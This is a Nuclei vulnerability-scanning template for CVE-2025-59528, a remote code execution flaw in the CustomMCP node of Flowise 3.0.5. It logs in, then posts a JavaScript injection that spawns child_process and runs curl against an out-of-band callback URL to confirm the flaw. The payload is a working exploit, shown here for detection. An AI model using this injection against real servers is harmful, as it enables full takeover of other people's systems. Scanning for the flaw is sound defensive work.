id: CVE-2025-59528

info:
  name: Flowise - Remote Code Execution
  author: xtr0nix
  severity: critical
  description: |
    Flowise 3.0.5 contains a remote code execution vulnerability caused by unsafe evaluation of user input in the CustomMCP node's convertToValidJSONString function, letting remote attackers execute arbitrary code with full Node.js privileges. Exploitation requires attacker-controlled input to be processed by the vulnerable node.
  impact: |
    Attackers can execute arbitrary code with full Node.js privileges, potentially leading to full system compromise.
  remediation: |
    Update to version 3.0.6 or later.
  reference:
    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59528
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-59528
    epss-score: 0.90183
    epss-percentile: 0.99782
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2025,flowise,rce,authenticated,vkev

flow: http(1) && http(2)

http:
  # Step 1: authenticate with the supplied credentials (the template is tagged "authenticated";
  # {{email}} and {{password}} must be provided as template variables).
  - raw:
      - |
        POST /api/v1/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{email}}","password":"{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "id", "email", "name")'
          - 'status_code == 200'
        condition: and
        internal: true

  # Step 2: submit a mcpServerConfig value to the CustomMCP node's load method and confirm
  # evaluation via an out-of-band DNS interaction.
  - raw:
      - |
        POST /api/v1/node-load-method/customMCP HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        x-request-from: internal

        {"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.execSync(\"curl {{interactsh-url}}\");return 1;})()})"}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "No Available Actions")'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044021f548064f72d71ef4ab207cf82561e0d678412f662455b8a1925d7f9623bf5ad0221008f37805ce5d6f45e098a4fa34d005f54a97ead38d2446f8ec071dff76743a45f:922c64590222798bb761d5b6d8e72950